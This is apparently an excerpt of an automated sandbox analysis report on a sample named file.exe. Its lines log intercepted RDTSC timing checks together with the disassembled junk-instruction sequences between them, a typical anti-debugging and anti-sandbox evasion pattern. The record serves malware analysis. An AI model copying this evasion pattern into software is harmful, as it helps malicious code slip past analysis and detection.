                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046C54 second address: 1046C68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB47527219Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046C68 second address: 1046C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104A793 second address: 104A7B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB47527219Fh 0x00000009 je 00007FB475272196h 0x0000000f jng 00007FB475272196h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046C71 second address: 1046D1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 add dword ptr [ebp+122D22C4h], edx 0x0000000e mov dword ptr [ebp+122D1816h], eax 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov edi, dword ptr [ebp+122D35E5h] 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 mov dword ptr [ebp+122D2270h], edi 0x0000002e mov eax, dword ptr [ebp+122D003Dh] 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007FB4752107F8h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 0000001Ch 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e call 00007FB475210804h 0x00000053 or dword ptr [ebp+122D27DCh], edx 0x00000059 pop ebx 0x0000005a push FFFFFFFFh 0x0000005c jp 00007FB4752107F8h 0x00000062 nop 0x00000063 jmp 00007FB475210809h 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007FB475210802h 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046D1D second address: 1046D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1046D23 second address: 1046D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104C022 second address: 104C039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jbe 00007FB47527219Ch 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105299E second address: 10529C5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB4752107F6h 0x00000008 jmp 00007FB475210808h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10529C5 second address: 10529E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jne 00007FB4752721A7h 0x0000000d popad 0x0000000e push esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10529E8 second address: 10529FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB4752107F6h 0x0000000a js 00007FB4752107F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052215 second address: 1052230 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4752721A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edi 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052357 second address: 1052361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB4752107F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052361 second address: 1052365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052365 second address: 1052398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB475210808h 0x0000000d jbe 00007FB4752107FCh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052398 second address: 105239C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105239C second address: 10523A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB4752107F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052551 second address: 1052565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB47527219Fh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057609 second address: 105760F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105760F second address: 1057613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058993 second address: 10589B8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB4752107F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB475210807h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEC9FC second address: FECA18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4752721A6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FECA18 second address: FECA52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB475210804h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB4752107FEh 0x00000010 push ebx 0x00000011 jmp 00007FB4752107FFh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FECA52 second address: FECA57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D4BA second address: 105D4C0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D4C0 second address: 105D4D0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007FB475272196h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D4D0 second address: 105D4D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D614 second address: 105D620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE4EB second address: FEE51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB475210802h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB475210808h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE51C second address: FEE528 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064F84 second address: 1064F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4752107FCh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103590A second address: 103590E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035CD6 second address: 1035D02 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB475210802h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB475210802h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10361D2 second address: 10361D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10361D9 second address: 1036232 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB4752107F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push ebx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ebx 0x00000010 pop esi 0x00000011 nop 0x00000012 mov dword ptr [ebp+122D1E7Eh], edx 0x00000018 push 0000001Eh 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FB4752107F8h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 nop 0x00000035 jmp 00007FB475210804h 0x0000003a push eax 0x0000003b jp 00007FB475210800h 0x00000041 push eax 0x00000042 push edx 0x00000043 push ecx 0x00000044 pop ecx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103632E second address: 1036334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10364CD second address: 1036502 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB4752107F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d js 00007FB4752107FCh 0x00000013 jng 00007FB4752107F6h 0x00000019 jmp 00007FB475210802h 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036502 second address: 1036528 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007FB4752721A0h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036528 second address: 103652C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10365C3 second address: 10365C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10365C7 second address: 10365D3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10365D3 second address: 10365D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10651F7 second address: 10651FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10651FF second address: 1065204 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101804A second address: 1018059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB4752107F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1018059 second address: 1018063 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB475272196h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065339 second address: 106533D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10659F3 second address: 10659F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065B24 second address: 1065B38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FB4752107F6h 0x0000000e jo 00007FB4752107F6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065B38 second address: 1065B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1065B3C second address: 1065B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106C401 second address: 106C406 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B13D second address: 106B143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B143 second address: 106B14D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB475272196h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B14D second address: 106B162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FB4752107F6h 0x0000000d jns 00007FB4752107F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106B162 second address: 106B168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106ADCF second address: 106ADD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106ADD3 second address: 106ADF2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007FB475272196h 0x0000000d jmp 00007FB4752721A0h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106ADF2 second address: 106ADF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106BD71 second address: 106BD75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106BD75 second address: 106BD91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB475210800h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106BD91 second address: 106BD95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1070998 second address: 10709D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB475210805h 0x00000009 jp 00007FB4752107F6h 0x0000000f popad 0x00000010 push eax 0x00000011 ja 00007FB4752107F6h 0x00000017 pop eax 0x00000018 pushad 0x00000019 jmp 00007FB4752107FFh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10709D2 second address: 10709D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1070BA6 second address: 1070BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FB4752107F8h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jnl 00007FB4752107F6h 0x00000018 ja 00007FB4752107F6h 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1070BC7 second address: 1070BE6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB4752721A5h 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107102C second address: 1071032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10711C7 second address: 10711FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FB4752721A8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB4752721A7h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10714D7 second address: 10714DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107030D second address: 1070311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074CC9 second address: 1074CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074CCF second address: 1074CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1074CDA second address: 1074CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB475210804h 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10776A3 second address: 10776AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10776AB second address: 10776B5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB4752107F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10776B5 second address: 10776BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10776BF second address: 10776C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A1E1 second address: 107A1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079D94 second address: 1079D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB4752107F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079D9E second address: 1079DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079DA2 second address: 1079DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB4752107F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079DB3 second address: 1079DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB475272196h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079DBE second address: 1079DDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB475210809h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079DDD second address: 1079DFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB47527219Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB47527219Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079DFA second address: 1079E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1079E00 second address: 1079E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DDA6 second address: 107DDAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DDAA second address: 107DDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FB47527219Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107D6D7 second address: 107D6DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107D6DB second address: 107D6FE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB47527219Ch 0x0000000e jnp 00007FB47527219Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DAC7 second address: 107DAE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FB475210808h 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DAE6 second address: 107DAEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DAEB second address: 107DAF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DAF1 second address: 107DAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107DAF7 second address: 107DAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107F278 second address: 107F2AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4752721A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB47527219Bh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB4752721A4h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10836FA second address: 10836FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
